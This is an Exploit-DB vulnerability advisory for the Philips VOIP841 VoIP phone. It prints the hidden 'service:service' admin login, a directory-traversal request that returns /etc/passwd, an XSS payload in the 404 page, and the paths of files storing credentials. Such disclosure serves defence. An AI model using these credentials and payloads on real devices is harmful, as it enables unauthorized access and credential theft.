.:[ Philips VOIP841 Multiple Vulnerabilities ]:.

vendor:

VOIP841

by:

Luca 'ikki' Carettoni

7.5

CVSS

HIGH

Hidden Administration Account, Directory Listing, Directory Traversal, Cross Site Scripting, Insecure Storage

200, 22, 79, 352

CWE

Product Name: VOIP841

Affected Version From: Firmware Version 1.0.4.50 and 1.0.4.80, Web Server Version 1.5 (simple httpd)

Affected Version To: Firmware Version 1.0.4.50 and 1.0.4.80, Web Server Version 1.5 (simple httpd)

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

.:[ Philips VOIP841 Multiple Vulnerabilities ]:.

A hidden administration account with username 'service' and password 'service' was discovered in the web management console of Philips VOIP841. Directory Listing and Directory Traversal vulnerabilities were also discovered, allowing an attacker to access sensitive files such as /etc/passwd. Additionally, Cross Site Scripting was discovered inside the 404 standard response page, and Insecure Storage of Skype credentials, web management console passwords, and other sensitive data was discovered in files such as /var/jffs2/data/save.dat and /tmp/apply.log.

Mitigation:

Ensure that the web management console is not accessible from the internet, and that all passwords are changed regularly.

Source

Exploit-DB raw data:

.:[ Philips VOIP841 Multiple Vulnerabilities ]:.
Luca "ikki" Carettoni - luca.carettoni@ikkisoft.com

Systems affected: Philips VOIP841, Firmware Version 1.0.4.50 and 1.0.4.80, Web Server Version 1.5 (simple httpd)
Systems not affected: n/a

(a) Hidden Administration Account (web management console)

service:service

(b) Directory Listing, Directory Traversal

jungle ikki $ telnet 192.168.1.10 80
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.
GET /../../../../../../../../etc/passwd HTTP/1.0
Host: 192.168.1.10
Authorization: Basic c2VydmljZTpzZXJ2aWNl

HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0

root:x:0:0:root:/root:/bin/bash
demo:x:5000:100:Demo User:/home/demo:/bin/bash
nobody:x:65534:65534:Nobody:/htdocs:/bin/bash
Connection closed by foreign host.

(c) Cross Site Scripting (XSS) inside the 404 standard response page

GET /var/htdocs/<script>alert("XSS");</script> HTTP/1.0

(d) Insecure Storage (Skype credentials,  web management console passwords, ...)

/var/jffs2/data/save.dat
/tmp/apply.log

# milw0rm.com [2008-02-14]